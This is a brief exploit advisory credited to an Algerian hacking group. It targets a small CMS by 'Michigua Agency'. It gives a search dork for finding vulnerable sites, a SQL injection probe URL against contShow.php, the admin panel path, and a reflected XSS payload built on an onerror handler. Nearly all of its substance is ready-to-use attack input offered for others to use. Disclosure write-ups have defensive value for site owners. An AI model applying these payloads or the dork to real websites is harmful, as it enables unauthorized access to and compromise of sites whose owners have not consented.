|#Exploit Title : Michigua Agency CMS Xss\Sql injection Vulnerability
|#Exploit Author: Algerian To The Core
|#Discovered by : Dr_h0uCk
|#Email : mos3absoufi@gmail.com
|#Dork : Designed By: Michigua Agency
|#tested on : win8.1 pro
|#Category : Web Application Bugs
|#Home : https://www.facebook.com/Hacker.AlgeriantoThecore
|#####################################################################
|
|#1 SQL INJECTION
|
|File: contShow.php
|
|POST:
|
|http://localhost/contShow.php?alb=1'%22&page=gall
|
|And The Admin Page Is Here :
|
|http://localhost/admin/
|
|#2 XSS
|
|http://localhost/contShow.php?q=Search%2520Website<isindex type%3dimage src%3d1 onerror%3dprompt(985956)>
|
|############
|
|Great's To : ALL MEMBERS IN Algerian To The Core && Mosta Team152
|